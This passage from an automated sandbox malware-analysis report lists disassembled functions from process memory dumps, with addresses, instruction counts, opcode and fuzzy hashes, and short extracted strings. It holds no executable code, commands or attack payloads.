                                                  Function 00007FFAACA891C2 Relevance: .0, Instructions: 36COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.2524664462.00007FFAACA80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACA80000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_7ffaaca80000_DZNTXHJCUWXUTqOrRrGotfqdMP.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 78f6f1b439cbd31dd29752d96fb2194557f19f575e17bc7db0b1f56f49f3e680
                                                  • Instruction ID: 0e39c3cc781b34aa87f6ec03a060f305d24ac8c33708de64c8f1d4a883804445
                                                  • Opcode Fuzzy Hash: 78f6f1b439cbd31dd29752d96fb2194557f19f575e17bc7db0b1f56f49f3e680
                                                  • Instruction Fuzzy Hash: F3F0CD3185E2C5DFE7068B70D8554B93FA1AF03210F0880F6E48DCB0A2E96D970AC7A1
                                                  Function 00007FFAAC6CBC7A Relevance: .0, Instructions: 33COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.2519212074.00007FFAAC6C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC6C0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_7ffaac6c0000_DZNTXHJCUWXUTqOrRrGotfqdMP.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 781664a7341bc87895364c97ec80148dbbb1ce5058f6250d021d6877d5eaa165
                                                  • Instruction ID: 3d0ee811f9eaf89f3a150a106a6f9b9654f32d51327ba7e79ddaecdc2f5a6617
                                                  • Opcode Fuzzy Hash: 781664a7341bc87895364c97ec80148dbbb1ce5058f6250d021d6877d5eaa165
                                                  • Instruction Fuzzy Hash: 06F0A42190E3828FE7138B658C910A93FA0EF5731070861FBC4498B0D3DA68A91AD7D1
                                                  Function 00007FFAAC6C109C Relevance: .0, Instructions: 26COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.2519212074.00007FFAAC6C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC6C0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_7ffaac6c0000_DZNTXHJCUWXUTqOrRrGotfqdMP.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 1dde8af2f8043c659d2b9ddd46c0fc62ec99e75775702029e4f7aaf3bd45a456
                                                  • Instruction ID: 52274b4c23895bf0c65f23a54b75dfb86fcdcdf26684258f2d96ba1c7c6b7ddb
                                                  • Opcode Fuzzy Hash: 1dde8af2f8043c659d2b9ddd46c0fc62ec99e75775702029e4f7aaf3bd45a456
                                                  • Instruction Fuzzy Hash: 3FE0393190964DCFEB56EF2884512A97BA1FF56300F049569E40C82185DA75DA68CBC1
                                                  Function 00007FFAAC6C34A1 Relevance: .0, Instructions: 12COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.2519212074.00007FFAAC6C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC6C0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_7ffaac6c0000_DZNTXHJCUWXUTqOrRrGotfqdMP.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 6c719b9b5f1cef3eab0f4326e91c3b8c5a3ab83dcbeb3567d5ca11ba30e24835
                                                  • Instruction ID: fca390271517f424ee459ad1803fd99122f3f1dba024d73478380303c1bb251f
                                                  • Opcode Fuzzy Hash: 6c719b9b5f1cef3eab0f4326e91c3b8c5a3ab83dcbeb3567d5ca11ba30e24835
                                                  • Instruction Fuzzy Hash: 50D0C960F1E243CBBB1B86A988540BDB2609F43344B94A134E11F5F3C6CD5CA84967D0
                                                  Function 00007FFAAC6C3D8B Relevance: .0, Instructions: 11COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.2519212074.00007FFAAC6C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC6C0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_7ffaac6c0000_DZNTXHJCUWXUTqOrRrGotfqdMP.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: e26bcc24fb1a896b6946a0d97841732cccd1314c2baa9518bebe6db8b0fac3d2
                                                  • Instruction ID: 02e68eb39ea634ae8424b5a94911c8f5b37a10a3c71c3776c8f0e149846cc3a7
                                                  • Opcode Fuzzy Hash: e26bcc24fb1a896b6946a0d97841732cccd1314c2baa9518bebe6db8b0fac3d2
                                                  • Instruction Fuzzy Hash: 55D09218A0E503D5F16B8B0982202BBB1A45F12701E24F83AD06F459C1CD18F4096281
                                                  Function 00007FFAAC6CC76B Relevance: .0, Instructions: 11COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.2519212074.00007FFAAC6C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC6C0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_7ffaac6c0000_DZNTXHJCUWXUTqOrRrGotfqdMP.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 1a5e1d483b634d4431efcaee70891d048c2b06872b56234492a8063f66121ced
                                                  • Instruction ID: f2854b48d34e02441268d0117f9d69b722d6da60a3ab818a9a40180cd5257980
                                                  • Opcode Fuzzy Hash: 1a5e1d483b634d4431efcaee70891d048c2b06872b56234492a8063f66121ced
                                                  • Instruction Fuzzy Hash: 1DD09214A0E557E5F22BCF21812063976949F43301E24F03AC15F518C18B1CF4196691
                                                  Function 00007FFAACA8A9BB Relevance: .0, Instructions: 11COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.2524664462.00007FFAACA80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACA80000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_7ffaaca80000_DZNTXHJCUWXUTqOrRrGotfqdMP.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: e0e84db1c0953825c6a11af4ca712878906a4be45a9a3713c164707f23aba6fe
                                                  • Instruction ID: 050bf80c59a22b66549e440f4527f06ff5b42f3e56de0a37a0696cfa65c36f50
                                                  • Opcode Fuzzy Hash: e0e84db1c0953825c6a11af4ca712878906a4be45a9a3713c164707f23aba6fe
                                                  • Instruction Fuzzy Hash: CCD09230A2F507C7F2785741602023A29979F42700F22C43AD09F619C1A91CFE496381
                                                  Function 00007FFAACA82ECB Relevance: .0, Instructions: 11COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.2524664462.00007FFAACA80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACA80000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_7ffaaca80000_DZNTXHJCUWXUTqOrRrGotfqdMP.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 62cc7584e29cb24c4cfb3fddda804cc385c9a5f8f3c197e42f2a5b70daa887f9
                                                  • Instruction ID: 694dd72be14ede94a275b8ca8ea8b84fd3a3a108cae2e2b7610499ac2054f2e8
                                                  • Opcode Fuzzy Hash: 62cc7584e29cb24c4cfb3fddda804cc385c9a5f8f3c197e42f2a5b70daa887f9
                                                  • Instruction Fuzzy Hash: F8D09228A2FA07CAF629A705612023959B65F26700F20C53AC09F418D1A919FB4963A6
                                                  Function 00007FFAAC6CB20C Relevance: .0, Instructions: 8COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.2519212074.00007FFAAC6C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC6C0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_7ffaac6c0000_DZNTXHJCUWXUTqOrRrGotfqdMP.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 97b5b4b87c2dba977795931ca0690acf225cd92460997749b6571d8fab43f2d0
                                                  • Instruction ID: c0da9a9ed4e79fe42db98b7d7c5ac65c70e50a55fd147bedc75f2e8aa9a4a172
                                                  • Opcode Fuzzy Hash: 97b5b4b87c2dba977795931ca0690acf225cd92460997749b6571d8fab43f2d0
                                                  • Instruction Fuzzy Hash: 01C04C7065E405CFF692DB19C584A2837A0EF45301F6560B4E00DDB1B5DA29EC059740
                                                  Function 00007FFAACA89ED3 Relevance: .0, Instructions: 6COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.2524664462.00007FFAACA80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACA80000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_7ffaaca80000_DZNTXHJCUWXUTqOrRrGotfqdMP.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 9a387468d7b75d82c239a31dcb19fed649040a8da0d84f97847f4e505b71c53a
                                                  • Instruction ID: 618166171c8e3c2ac21cc359a57f449b51c9e1e7d832eba3e861ccdec52c64bb
                                                  • Opcode Fuzzy Hash: 9a387468d7b75d82c239a31dcb19fed649040a8da0d84f97847f4e505b71c53a
                                                  • Instruction Fuzzy Hash: C3B09220E2E203C3B52066B4244007C00530B06280B20C631A20E892C2FC4EAE0863E0

                                                  Non-executed Functions

                                                  Function 00007FFAAC6C04BA Relevance: 7.9, Strings: 6, Instructions: 397COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.2519212074.00007FFAAC6C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC6C0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_7ffaac6c0000_DZNTXHJCUWXUTqOrRrGotfqdMP.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 2_^$2_^$2_^$2_^$<2_^$>2_^
                                                  • API String ID: 0-484592079
                                                  • Opcode ID: 5edcf27ccf1ba9cb254ee7392eda84116fb87082d31f5252b6ba16e73d8986b1
                                                  • Instruction ID: f2f1c4003587e221636b18fed72f98874eeec755960f7cbee3886110e815faee
                                                  • Opcode Fuzzy Hash: 5edcf27ccf1ba9cb254ee7392eda84116fb87082d31f5252b6ba16e73d8986b1
                                                  • Instruction Fuzzy Hash: 87E1995294E3925BF713B778E8764DA7FD05F0321C71C92B3D09A8E2A3ED086158C6D9
                                                  Function 00007FFAAC6C87FA Relevance: 5.2, Strings: 4, Instructions: 194COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.2519212074.00007FFAAC6C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC6C0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_7ffaac6c0000_DZNTXHJCUWXUTqOrRrGotfqdMP.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 1_^$1_^$1_^$1_^
                                                  • API String ID: 0-2465893738
                                                  • Opcode ID: 023981fe169fc197e79570b23b19c39dcb1bb2aa239262f063f155e2109868c2
                                                  • Instruction ID: 270a2a9b36a858bb23cd17e92010ef46f8053d4f82d1df7df1a162070f55fc84
                                                  • Opcode Fuzzy Hash: 023981fe169fc197e79570b23b19c39dcb1bb2aa239262f063f155e2109868c2
                                                  • Instruction Fuzzy Hash: 1E612193D0E292DBF253B738D8A58EA3FD09F1321871C81B6D05E8F2A3FC1D65498695
                                                  Function 00007FFAAC6C32B3 Relevance: 5.1, Strings: 4, Instructions: 101COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.2519212074.00007FFAAC6C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC6C0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_7ffaac6c0000_DZNTXHJCUWXUTqOrRrGotfqdMP.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 8\$m8_H${z}$1_H
                                                  • API String ID: 0-1968118676
                                                  • Opcode ID: 054f1a74d0cf52eba594a41e1e4736fecea9ee040f40dbd052b035a8713eb811
                                                  • Instruction ID: 33a378e858aa390650ae35757c774e911a9378b7562f24e9e13d40042b149025
                                                  • Opcode Fuzzy Hash: 054f1a74d0cf52eba594a41e1e4736fecea9ee040f40dbd052b035a8713eb811
                                                  • Instruction Fuzzy Hash: C231E6A1B19A068FF75ADB28C0956F677A1FB65300F44D53DD04FC7292DE2CA90687C0